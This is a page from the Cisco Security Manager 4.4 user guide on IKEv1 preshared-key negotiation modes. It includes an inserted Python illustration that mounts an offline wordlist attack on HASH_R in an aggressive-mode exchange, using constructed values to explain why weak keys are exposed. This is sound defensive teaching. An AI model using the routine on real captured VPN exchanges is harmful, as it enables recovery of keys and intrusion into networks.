25-44
User Guide for Cisco Security Manager 4.4
OL-28826-01
Chapter 25 Configuring IKE and IPsec Policies
Understanding IKEv1 Preshared Key Policies in Site-to-Site VPNs
Note If you are configuring DMVPN with direct spoke-to-spoke connectivity, you create a
wildcard key on the spokes.
Main mode fully qualified domain name (FQDN)—Negotiation is based on DNS resolution, with
no reliance on IP address. This option can only be used if the DNS resolution service is available
for the host. It is useful when managing devices with dynamic IP addresses that have DNS resolution
capabilities.
Aggressive mode—Negotiation is based on hostname (without DNS resolution) and domain name.
Aggressive mode is less secure than main mode: the peer identities and the authentication hash
derived from the preshared key are sent before encryption is established, so anyone who captures
the exchange can test guesses of the preshared key offline. If you use aggressive mode, the key
must be long and random, not a word or phrase a wordlist would contain. However, it provides more
security than using group preshared keys if the IP address of the VPN interface on the host is
unknown and the FQDN of the dynamic IP peer is not DNS resolvable. This negotiation method is
recommended for use with a GRE Dynamic IP or DMVPN failover and routing policy.
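The following Python script is an added illustration of why aggressive mode with a preshared key is weaker than main mode; it is not part of this guide and not code from Cisco Security Manager. It recomputes the responder's HASH_R exactly as RFC 2409 defines it for preshared-key authentication (SKEYID = prf(psk, Ni | Nr); HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)) and runs a wordlist against a captured value. The exchange fields are constructed stand-ins for the public contents of aggressive-mode messages 1 and 2 (the DH values are deliberately short), HMAC-SHA1 is assumed as the negotiated prf, and the hostname vpn-hub.example.test is a made-up identity.

```python
"""Offline preshared-key recovery against an IKEv1 aggressive-mode exchange.

In aggressive mode HASH_R travels in the clear in message 2 and every other
input to it is visible in messages 1 and 2, so a passive observer can check
PSK guesses offline. Main mode sends HASH_I/HASH_R only in the encrypted
messages 5 and 6, so the same shortcut does not exist there.

All exchange values are CONSTRUCTED for illustration, not a real capture.
HMAC-SHA1 stands in for whatever prf the peers negotiated.
"""
import hashlib
import hmac
import secrets
from typing import Optional, Sequence


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)  (RFC 2409 section 5.4)."""
    return hmac.new(psk, ni + nr, hashlib.sha1).digest()


def hash_r(psk: bytes, ex: dict) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, ex["ni"], ex["nr"])
    data = (ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"]
            + ex["sai_b"] + ex["idir_b"])
    return hmac.new(skeyid, data, hashlib.sha1).digest()


def constructed_exchange() -> dict:
    """Deterministic stand-in for the public fields an observer sees in
    aggressive-mode messages 1 and 2. Constructed values, not a capture;
    the DH public values are far shorter than real ones."""
    return {
        "cky_i": bytes.fromhex("0123456789abcdef"),   # initiator cookie
        "cky_r": bytes.fromhex("fedcba9876543210"),   # responder cookie
        "ni": bytes(range(16)),                        # initiator nonce
        "nr": bytes(range(16, 32)),                    # responder nonce
        "gxi": b"\x11" * 32,                           # initiator DH public value
        "gxr": b"\x22" * 32,                           # responder DH public value
        # SA payload body as offered by the initiator (constructed bytes)
        "sai_b": bytes.fromhex("00000001000000010000002801010000"),
        # responder ID payload body: ID_FQDN (2), proto 0, port 0, then the name
        "idir_b": b"\x02\x00\x00\x00" + b"vpn-hub.example.test",
    }


def recover_psk(observed_hash_r: bytes, wordlist: Sequence[bytes],
                ex: dict) -> Optional[bytes]:
    """Dictionary attack: recompute HASH_R for each candidate and compare."""
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate, ex), observed_hash_r):
            return candidate
    return None


def generate_psk(nbytes: int = 32) -> bytes:
    """What an auto-generated key should look like: 256 bits from the CSPRNG.
    No wordlist contains it, so the attack above cannot succeed."""
    return secrets.token_bytes(nbytes)


if __name__ == "__main__":
    ex = constructed_exchange()
    wordlist = [b"password", b"cisco", b"cisco123", b"Secret123", b"vpnvpnvpn"]
    print("weak PSK recovered:  ", recover_psk(hash_r(b"cisco123", ex), wordlist, ex))
    print("random PSK recovered:", recover_psk(hash_r(generate_psk(), ex), wordlist, ex))
```

The script only needs what a passive observer has; it never touches the DH private values. That is the practical difference from main mode, where the hashes are exchanged under a key derived from the DH result, so choosing User Defined keys that are short or guessable is a real exposure whenever aggressive mode is selected.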
Related Topics
Deciding Which Authentication Method to Use, page 25-8
Configuring IKEv1 Preshared Key Policies, page 25-44
Configuring IKEv1 Preshared Key Policies
Use the IKEv1 Preshared Key page to define the preshared key configuration when using IKEv1 in a
site-to-site VPN topology. For information on configuring preshared keys when using IKEv2, see
Configuring IKEv2 Authentication in Site-to-Site VPNs, page 25-62.
Note The preshared key policy does not apply to Easy VPN topologies.
To open the IKEv1 Preshared Key page:
(Site-to-Site VPN Manager Window, page 24-18) Select a topology in the VPNs selector, then select
IKEv1 Preshared Key in the Policies selector.
(Policy view) Select Site-to-Site VPN > IKEv1 Preshared Key from the Policy Types selector.
Select an existing shared policy or create a new one.
The following table explains the settings you can configure in this policy.
Table 25-9 IKEv1 Preshared Key Page
Element Description
Key Specification
Select whether to manually define the key (User Defined) or to have the key automatically generated.
There are additional options you can configure when using auto generated keys.
User Defined When selected, enables you to use a manually defined preshared key.
Enter the required preshared key in the Key field, then enter it again in
the Confirm field.